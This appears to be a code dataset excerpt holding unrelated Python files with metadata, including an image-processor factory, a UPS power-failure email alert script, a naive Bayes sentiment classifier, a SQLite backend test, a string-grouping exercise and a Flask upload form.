from ipapi.file_handlers.fh_base import file_handler_factory
from ipapi.base.ip_abstract import BaseImageProcessor
from ipapi.tools.common_functions import get_module_classes
def ipo_factory(
file_path, options=None, force_abstract: bool = False, data_base=None, scale_factor=1
):
if force_abstract:
return BaseImageProcessor(
file_path, options, database=data_base, scale_factor=scale_factor
)
else:
# Build unique class list
ipt_classes_list = get_module_classes(
package=class_pipelines,
class_inherits_from=BaseImageProcessor,
remove_abstract=True,
)
# Create temporary image wrapper to detect experiment
fh = file_handler_factory(file_path, data_base)
# Select able class
ipt_classes_list = list(set(ipt_classes_list))
for cls in ipt_classes_list:
if callable(getattr(cls, "can_process", None)) and cls.can_process(
dict(experiment=fh.experiment, robot=fh.__class__.__name__)
):
return cls(
file_path, options, database=data_base, scale_factor=scale_factor
)
return BaseImageProcessor(
file_path, options, database=data_base, scale_factor=scale_factor
)
|
import inspect
import sys
import pkgutil
import ipapi.class_pipelines as class_pipelines
from ipapi.file_handlers.fh_base import file_handler_factory
from ipapi.base.ip_abstract import BaseImageProcessor
from ipapi.tools.common_functions import get_module_classes
def ipo_factory(
file_path, options=None, force_abstract: bool = False, data_base=None, scale_factor=1
):
if force_abstract:
return BaseImageProcessor(
file_path, options, database=data_base, scale_factor=scale_factor
)
else:
# Build unique class list
ipt_classes_list = get_module_classes(
package=class_pipelines,
class_inherits_from=BaseImageProcessor,
remove_abstract=True,
)
# Create temporary image wrapper to detect experiment
fh = file_handler_factory(file_path, data_base)
# Select able class
ipt_classes_list = list(set(ipt_classes_list))
for cls in ipt_classes_list:
if callable(getattr(cls, "can_process", None)) and cls.can_process(
dict(experiment=fh.experiment, robot=fh.__class__.__name__)
):
return cls(
file_path, options, database=data_base, scale_factor=scale_factor
)
return BaseImageProcessor(
file_path, options, database=data_base, scale_factor=scale_factor
)
|
en
| 0.650826
|
# Build unique class list # Create temporary image wrapper to detect experiment # Select able class
| 2.166619
| 2
|
onbattery.py
|
bzsparks/apcupsd-alert
| 0
|
6628505
|
<filename>onbattery.py
#!/usr/bin/env python3
import smtplib
import sqlite3
import json
from datetime import datetime
from email.mime.text import MIMEText
from contextlib import closing
def GetRequired():
with open('required.json', 'r') as fin:
return json.loads(fin.read())
def SetOutageInfo(now):
try:
con = sqlite3.connect('apcupsd.sqlite')
with closing(con.cursor()) as cur:
cur.execute('INSERT INTO apcd_onbattery (onbattery) VALUES (\'{0}\')'.format(now))
cur.execute('SELECT ID FROM apcd_onbattery WHERE onbattery=\'{0}\''.format(now))
lastID = cur.fetchone()[0]
cur.execute('UPDATE apcd_last_onbattery SET last_onbattery=(\'{0}\') WHERE rowid=1'.format(lastID))
con.commit()
except sqlite3.Error as e:
if con:
con.rollback()
print('Error {0}:'.format(e.args[0]))
finally:
if con:
con.close()
def SendGmailMsg(required, now):
gmailAddress = required['sender']
gmailPassword = <PASSWORD>['password'] #App Specific Password
fromSender = gmailAddress
toRecipients = required['recipients']
msg_subject = 'ALERT: Home UPS Power Failure'
msg_text = 'Home is now on battery power. {0}'.format(now)
msg = MIMEText(msg_text)
msg['Subject'] = msg_subject
msg['From'] = fromSender
msg['To'] = ", ".join(toRecipients)
s = smtplib.SMTP_SSL('smtp.gmail.com', '465')
s.login(gmailAddress, gmailPassword)
s.sendmail(fromSender, toRecipients, msg.as_string())
s.quit()
#Main
if __name__ == "__main__":
now = datetime.now()
required = GetRequired()
SetOutageInfo(now)
SendGmailMsg(required, now)
|
<filename>onbattery.py
#!/usr/bin/env python3
import smtplib
import sqlite3
import json
from datetime import datetime
from email.mime.text import MIMEText
from contextlib import closing
def GetRequired():
with open('required.json', 'r') as fin:
return json.loads(fin.read())
def SetOutageInfo(now):
try:
con = sqlite3.connect('apcupsd.sqlite')
with closing(con.cursor()) as cur:
cur.execute('INSERT INTO apcd_onbattery (onbattery) VALUES (\'{0}\')'.format(now))
cur.execute('SELECT ID FROM apcd_onbattery WHERE onbattery=\'{0}\''.format(now))
lastID = cur.fetchone()[0]
cur.execute('UPDATE apcd_last_onbattery SET last_onbattery=(\'{0}\') WHERE rowid=1'.format(lastID))
con.commit()
except sqlite3.Error as e:
if con:
con.rollback()
print('Error {0}:'.format(e.args[0]))
finally:
if con:
con.close()
def SendGmailMsg(required, now):
gmailAddress = required['sender']
gmailPassword = <PASSWORD>['password'] #App Specific Password
fromSender = gmailAddress
toRecipients = required['recipients']
msg_subject = 'ALERT: Home UPS Power Failure'
msg_text = 'Home is now on battery power. {0}'.format(now)
msg = MIMEText(msg_text)
msg['Subject'] = msg_subject
msg['From'] = fromSender
msg['To'] = ", ".join(toRecipients)
s = smtplib.SMTP_SSL('smtp.gmail.com', '465')
s.login(gmailAddress, gmailPassword)
s.sendmail(fromSender, toRecipients, msg.as_string())
s.quit()
#Main
if __name__ == "__main__":
now = datetime.now()
required = GetRequired()
SetOutageInfo(now)
SendGmailMsg(required, now)
|
en
| 0.372344
|
#!/usr/bin/env python3 #App Specific Password #Main
| 2.487731
| 2
|
naive_bayes_mixture.py
|
devin040/messageSA
| 0
|
6628506
|
<gh_stars>0
# naive_bayes.py
# ---------------
# Licensing Information: You are free to use or extend this projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to the University of Illinois at Urbana-Champaign
#
# Created by <NAME> (<EMAIL>) on 09/28/2018
# Modified by <NAME> 02/02/2020
"""
This is the main entry point for Part 2 of this MP. You should only modify code
within this file for Part 2 -- the unrevised staff files will be used for all other
files and classes when code is run, so be careful to not modify anything else.
"""
import numpy as numpy
import math
from collections import Counter
import nltk
#import pudb; pu.db
from tqdm import tqdm
def naiveBayesMixture(train_set, train_labels, dev_set, imessages, imessage_batch, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
"""
train_set - List of list of words corresponding with each movie review
example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
Then train_set := [['like','this','movie'], ['i','fall','asleep']]
train_labels - List of labels corresponding with train_set
example: Suppose I had two reviews, first one was positive and second one was negative.
Then train_labels := [1, 0]
dev_set - List of list of words corresponding with each review that we are testing on
It follows the same format as train_set
bigram_lambda - float between 0 and 1
unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
pos_prior - positive prior probability (between 0 and 1)
"""
positive_counter = Counter()
negative_counter = Counter()
total_num_pos_reviews = 0
total_num_neg_reviews = 0
total_pos_words = 0
total_neg_words = 0
pos_bigram_counter = Counter()
neg_bigram_counter = Counter()
total_pos_bigrams = 0
total_neg_bigrams = 0
cross_idx = 0
for review in train_set:
wordlist = set()
for word in review:
if train_labels[cross_idx] == 1:
positive_counter[word] += 1
total_pos_words += 1
elif train_labels[cross_idx] == 0:
negative_counter[word] += 1
total_neg_words += 1
wordlist.add(word)
for bigram in nltk.bigrams(review):
if train_labels[cross_idx] == 1:
pos_bigram_counter[bigram] += 1
total_pos_bigrams += 1
elif train_labels[cross_idx] == 0:
neg_bigram_counter[bigram] += 1
total_neg_bigrams += 1
cross_idx += 1
dev_labels = []
pos_count = 0
neg_count = 0
for review in dev_set:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in review:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(review):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
dev_labels.append(1)
pos_count += 1
else:
dev_labels.append(0)
neg_count += 1
positive_texts = []
negative_texts = []
all_texts = []
pos_count = 0
neg_count = 0
pos_prior = .6
for message in imessage_batch:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in message[0]:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(message[0]):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
positive_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
all_texts.append((1, message[0], message[1]))
pos_count += 1
else:
negative_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
all_texts.append((-1, message[0], message[1]))
neg_count += 1
positive_texts = sorted(positive_texts, key=lambda text: text[0], reverse=True)
negative_texts = sorted(negative_texts, key=lambda text: text[0], reverse=True)
with open('pos.txt', 'w+', encoding='utf-8') as o:
for i in positive_texts:
o.write(""+ str(i[0]) + " " + " ".join(i[1]) + "\n")
o.close()
with open('neg.txt', 'w+', encoding='utf-8') as o:
for i in negative_texts:
o.write("" + str(i[0]) + " " + " ".join(i[1]) + "\n")
o.close()
#print(sorted(positive_texts, key=lambda text: text[0])[:100])
#print(sorted(negative_texts, key=lambda text: text[0])[:100])
# return predicted labels of development set (make sure it's a list, not a numpy array or similar)
return dev_labels
def naiveBayesMixtureSent140(train_set, train_labels, dev_set, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
"""
train_set - List of list of words corresponding with each movie review
example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
Then train_set := [['like','this','movie'], ['i','fall','asleep']]
train_labels - List of labels corresponding with train_set
example: Suppose I had two reviews, first one was positive and second one was negative.
Then train_labels := [1, 0]
dev_set - List of list of words corresponding with each review that we are testing on
It follows the same format as train_set
bigram_lambda - float between 0 and 1
unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
pos_prior - positive prior probability (between 0 and 1)
"""
positive_counter = Counter()
negative_counter = Counter()
total_num_pos_reviews = 0
total_num_neg_reviews = 0
total_pos_words = 0
total_neg_words = 0
pos_bigram_counter = Counter()
neg_bigram_counter = Counter()
total_pos_bigrams = 0
total_neg_bigrams = 0
pos_prior = .5
cross_idx = 0
for review in tqdm(train_set):
wordlist = set()
for word in review:
if train_labels[cross_idx] == 4:
positive_counter[word] += 1
total_pos_words += 1
elif train_labels[cross_idx] == 0:
negative_counter[word] += 1
total_neg_words += 1
wordlist.add(word)
for bigram in nltk.bigrams(review):
if train_labels[cross_idx] == 4:
pos_bigram_counter[bigram] += 1
total_pos_bigrams += 1
elif train_labels[cross_idx] == 0:
neg_bigram_counter[bigram] += 1
total_neg_bigrams += 1
cross_idx += 1
dev_labels = []
pos_count = 0
neg_count = 0
for review in dev_set:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in review:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(review):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
dev_labels.append(4)
pos_count += 1
else:
dev_labels.append(0)
neg_count += 1
return dev_labels
|
# naive_bayes.py
# ---------------
# Licensing Information: You are free to use or extend this projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to the University of Illinois at Urbana-Champaign
#
# Created by <NAME> (<EMAIL>) on 09/28/2018
# Modified by <NAME> 02/02/2020
"""
This is the main entry point for Part 2 of this MP. You should only modify code
within this file for Part 2 -- the unrevised staff files will be used for all other
files and classes when code is run, so be careful to not modify anything else.
"""
import numpy as numpy
import math
from collections import Counter
import nltk
#import pudb; pu.db
from tqdm import tqdm
def naiveBayesMixture(train_set, train_labels, dev_set, imessages, imessage_batch, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
"""
train_set - List of list of words corresponding with each movie review
example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
Then train_set := [['like','this','movie'], ['i','fall','asleep']]
train_labels - List of labels corresponding with train_set
example: Suppose I had two reviews, first one was positive and second one was negative.
Then train_labels := [1, 0]
dev_set - List of list of words corresponding with each review that we are testing on
It follows the same format as train_set
bigram_lambda - float between 0 and 1
unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
pos_prior - positive prior probability (between 0 and 1)
"""
positive_counter = Counter()
negative_counter = Counter()
total_num_pos_reviews = 0
total_num_neg_reviews = 0
total_pos_words = 0
total_neg_words = 0
pos_bigram_counter = Counter()
neg_bigram_counter = Counter()
total_pos_bigrams = 0
total_neg_bigrams = 0
cross_idx = 0
for review in train_set:
wordlist = set()
for word in review:
if train_labels[cross_idx] == 1:
positive_counter[word] += 1
total_pos_words += 1
elif train_labels[cross_idx] == 0:
negative_counter[word] += 1
total_neg_words += 1
wordlist.add(word)
for bigram in nltk.bigrams(review):
if train_labels[cross_idx] == 1:
pos_bigram_counter[bigram] += 1
total_pos_bigrams += 1
elif train_labels[cross_idx] == 0:
neg_bigram_counter[bigram] += 1
total_neg_bigrams += 1
cross_idx += 1
dev_labels = []
pos_count = 0
neg_count = 0
for review in dev_set:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in review:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(review):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
dev_labels.append(1)
pos_count += 1
else:
dev_labels.append(0)
neg_count += 1
positive_texts = []
negative_texts = []
all_texts = []
pos_count = 0
neg_count = 0
pos_prior = .6
for message in imessage_batch:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in message[0]:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(message[0]):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
positive_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
all_texts.append((1, message[0], message[1]))
pos_count += 1
else:
negative_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
all_texts.append((-1, message[0], message[1]))
neg_count += 1
positive_texts = sorted(positive_texts, key=lambda text: text[0], reverse=True)
negative_texts = sorted(negative_texts, key=lambda text: text[0], reverse=True)
with open('pos.txt', 'w+', encoding='utf-8') as o:
for i in positive_texts:
o.write(""+ str(i[0]) + " " + " ".join(i[1]) + "\n")
o.close()
with open('neg.txt', 'w+', encoding='utf-8') as o:
for i in negative_texts:
o.write("" + str(i[0]) + " " + " ".join(i[1]) + "\n")
o.close()
#print(sorted(positive_texts, key=lambda text: text[0])[:100])
#print(sorted(negative_texts, key=lambda text: text[0])[:100])
# return predicted labels of development set (make sure it's a list, not a numpy array or similar)
return dev_labels
def naiveBayesMixtureSent140(train_set, train_labels, dev_set, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
"""
train_set - List of list of words corresponding with each movie review
example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
Then train_set := [['like','this','movie'], ['i','fall','asleep']]
train_labels - List of labels corresponding with train_set
example: Suppose I had two reviews, first one was positive and second one was negative.
Then train_labels := [1, 0]
dev_set - List of list of words corresponding with each review that we are testing on
It follows the same format as train_set
bigram_lambda - float between 0 and 1
unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
pos_prior - positive prior probability (between 0 and 1)
"""
positive_counter = Counter()
negative_counter = Counter()
total_num_pos_reviews = 0
total_num_neg_reviews = 0
total_pos_words = 0
total_neg_words = 0
pos_bigram_counter = Counter()
neg_bigram_counter = Counter()
total_pos_bigrams = 0
total_neg_bigrams = 0
pos_prior = .5
cross_idx = 0
for review in tqdm(train_set):
wordlist = set()
for word in review:
if train_labels[cross_idx] == 4:
positive_counter[word] += 1
total_pos_words += 1
elif train_labels[cross_idx] == 0:
negative_counter[word] += 1
total_neg_words += 1
wordlist.add(word)
for bigram in nltk.bigrams(review):
if train_labels[cross_idx] == 4:
pos_bigram_counter[bigram] += 1
total_pos_bigrams += 1
elif train_labels[cross_idx] == 0:
neg_bigram_counter[bigram] += 1
total_neg_bigrams += 1
cross_idx += 1
dev_labels = []
pos_count = 0
neg_count = 0
for review in dev_set:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in review:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(review):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
dev_labels.append(4)
pos_count += 1
else:
dev_labels.append(0)
neg_count += 1
return dev_labels
|
en
| 0.864806
|
# naive_bayes.py # --------------- # Licensing Information: You are free to use or extend this projects for # educational purposes provided that (1) you do not distribute or publish # solutions, (2) you retain this notice, and (3) you provide clear # attribution to the University of Illinois at Urbana-Champaign # # Created by <NAME> (<EMAIL>) on 09/28/2018 # Modified by <NAME> 02/02/2020 This is the main entry point for Part 2 of this MP. You should only modify code within this file for Part 2 -- the unrevised staff files will be used for all other files and classes when code is run, so be careful to not modify anything else. #import pudb; pu.db train_set - List of list of words corresponding with each movie review example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set Then train_set := [['like','this','movie'], ['i','fall','asleep']] train_labels - List of labels corresponding with train_set example: Suppose I had two reviews, first one was positive and second one was negative. Then train_labels := [1, 0] dev_set - List of list of words corresponding with each review that we are testing on It follows the same format as train_set bigram_lambda - float between 0 and 1 unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1) bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1) pos_prior - positive prior probability (between 0 and 1) #print(sorted(positive_texts, key=lambda text: text[0])[:100]) #print(sorted(negative_texts, key=lambda text: text[0])[:100]) # return predicted labels of development set (make sure it's a list, not a numpy array or similar) train_set - List of list of words corresponding with each movie review example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set Then train_set := [['like','this','movie'], ['i','fall','asleep']] train_labels - List of labels corresponding with train_set example: Suppose I had two reviews, first one was positive and second one was negative. Then train_labels := [1, 0] dev_set - List of list of words corresponding with each review that we are testing on It follows the same format as train_set bigram_lambda - float between 0 and 1 unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1) bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1) pos_prior - positive prior probability (between 0 and 1)
| 2.976752
| 3
|
config.py
|
rauldatascience/sentiment-analysis
| 2
|
6628507
|
DATA_FILEPATH = "data/tweets_100k"
FEATURE_EXTRACTOR_FILEPATH = "model/feature_extractor_latest.pk"
CLASSIFIER_FILEPATH = "model/classifier_latest.pk"
LABELS = {
0: "negative",
4: "positive"
}
|
DATA_FILEPATH = "data/tweets_100k"
FEATURE_EXTRACTOR_FILEPATH = "model/feature_extractor_latest.pk"
CLASSIFIER_FILEPATH = "model/classifier_latest.pk"
LABELS = {
0: "negative",
4: "positive"
}
|
none
| 1
| 1.246951
| 1
|
|
tests/test_sqlite.py
|
danielerapati/dagobah
| 1
|
6628508
|
""" Tests on the SQLite backend """
import os
import datetime
import json
import yaml
from nose.tools import nottest
from dagobah.core.core import Dagobah
from dagobah.core.components import StrictJSONEncoder
from dagobah.backend.sqlite import SQLiteBackend
class TestSQLite(object):
@classmethod
def setup_class(self):
location = os.path.realpath(os.path.join(os.getcwd(),
os.path.dirname(__file__)))
config_file = open(os.path.join(location, 'test_config.yml'))
config = yaml.load(config_file.read())
config_file.close()
if os.getenv('TRAVIS', 'false') == 'true':
self.filepath = 'memory'
else:
self.filepath = config.get('SQLiteBackend', {}).\
get('filepath', 'memory')
self.dagobah = None
@classmethod
def teardown_class(self):
pass
@nottest
def new_dagobah(self, return_instance=False):
if not return_instance:
self.dagobah = Dagobah(SQLiteBackend(self.filepath))
else:
return Dagobah(SQLiteBackend(self.filepath))
def test_decode_json(self):
self.new_dagobah()
now = datetime.datetime.now()
test_doc = {"nested": {"dt": now},
"array": [{"dt": now},
{"dt2": now,
"int": 5},
{"str": "woot"}]}
json_doc = json.dumps(test_doc, cls=StrictJSONEncoder)
result = self.dagobah.backend.decode_import_json(json_doc)
print test_doc
print result
assert result == test_doc
|
""" Tests on the SQLite backend """
import os
import datetime
import json
import yaml
from nose.tools import nottest
from dagobah.core.core import Dagobah
from dagobah.core.components import StrictJSONEncoder
from dagobah.backend.sqlite import SQLiteBackend
class TestSQLite(object):
@classmethod
def setup_class(self):
location = os.path.realpath(os.path.join(os.getcwd(),
os.path.dirname(__file__)))
config_file = open(os.path.join(location, 'test_config.yml'))
config = yaml.load(config_file.read())
config_file.close()
if os.getenv('TRAVIS', 'false') == 'true':
self.filepath = 'memory'
else:
self.filepath = config.get('SQLiteBackend', {}).\
get('filepath', 'memory')
self.dagobah = None
@classmethod
def teardown_class(self):
pass
@nottest
def new_dagobah(self, return_instance=False):
if not return_instance:
self.dagobah = Dagobah(SQLiteBackend(self.filepath))
else:
return Dagobah(SQLiteBackend(self.filepath))
def test_decode_json(self):
self.new_dagobah()
now = datetime.datetime.now()
test_doc = {"nested": {"dt": now},
"array": [{"dt": now},
{"dt2": now,
"int": 5},
{"str": "woot"}]}
json_doc = json.dumps(test_doc, cls=StrictJSONEncoder)
result = self.dagobah.backend.decode_import_json(json_doc)
print test_doc
print result
assert result == test_doc
|
en
| 0.487877
|
Tests on the SQLite backend
| 2.217814
| 2
|
0_Companies/CISCO.py
|
allenalvin333/Hackerrank_Interview
| 2
|
6628509
|
<filename>0_Companies/CISCO.py
# Cisco Preliminary Test
S,l,ini,c,m=input(),list(map(str,input().split())),[],0,0
while(m<len(S)):
x=m
while(x<len(S)):
if(S[x]!=S[m]): break
x+=1
ini.append(S[m:x])
m=x
for z in l:
m,k=0,[]
while(m<len(z)):
x=m
while(x<len(z)):
if(z[x]!=z[m]): break
x+=1
k.append(z[m:x])
m=x
allen=0
for y in range(len(k)):
# if(k[y]==ini[y] or k[y]*3==ini[y]): allen+=1
if(k[y]==ini[y] or list(set(k[y]))[0]*3==ini[y]): allen+=1
if(allen==len(k)): c+=1
print(c)
|
<filename>0_Companies/CISCO.py
# Cisco Preliminary Test
S,l,ini,c,m=input(),list(map(str,input().split())),[],0,0
while(m<len(S)):
x=m
while(x<len(S)):
if(S[x]!=S[m]): break
x+=1
ini.append(S[m:x])
m=x
for z in l:
m,k=0,[]
while(m<len(z)):
x=m
while(x<len(z)):
if(z[x]!=z[m]): break
x+=1
k.append(z[m:x])
m=x
allen=0
for y in range(len(k)):
# if(k[y]==ini[y] or k[y]*3==ini[y]): allen+=1
if(k[y]==ini[y] or list(set(k[y]))[0]*3==ini[y]): allen+=1
if(allen==len(k)): c+=1
print(c)
|
en
| 0.193141
|
# Cisco Preliminary Test # if(k[y]==ini[y] or k[y]*3==ini[y]): allen+=1
| 3.171659
| 3
|
forms.py
|
gracideas/spekcheck
| 1
|
6628510
|
import os
from flask import request, redirect
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, SubmitField, TextField, MultipleFileField
from wtforms.validators import DataRequired, Length
from werkzeug.utils import secure_filename
# Defines fields for new entry form
class SubmissionForm(FlaskForm):
musicbrainz_album_id = StringField('MusicBrainz ID', validators=[DataRequired(), Length(min=36, max=36)])
source = TextField('Source', validators=[DataRequired(), Length(min=5)])
upload = MultipleFileField('Upload', validators=[FileRequired()])
submit = SubmitField('Submit')
|
import os
from flask import request, redirect
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, SubmitField, TextField, MultipleFileField
from wtforms.validators import DataRequired, Length
from werkzeug.utils import secure_filename
# Defines fields for new entry form
class SubmissionForm(FlaskForm):
musicbrainz_album_id = StringField('MusicBrainz ID', validators=[DataRequired(), Length(min=36, max=36)])
source = TextField('Source', validators=[DataRequired(), Length(min=5)])
upload = MultipleFileField('Upload', validators=[FileRequired()])
submit = SubmitField('Submit')
|
en
| 0.717982
|
# Defines fields for new entry form
| 2.378799
| 2
|
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/mglutil/gui/BasicWidgets/Tk/graphtool.py
|
J-E-J-S/aaRS-Pipeline
| 8
|
6628511
|
<reponame>J-E-J-S/aaRS-Pipeline
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
##############################################################################
#
#
# Authors: <NAME>,<NAME>
#
#
###############################################################################
#
#
#
#
#$Id: graphtool.py,v 1.47 2007/12/04 21:28:04 vareille Exp $
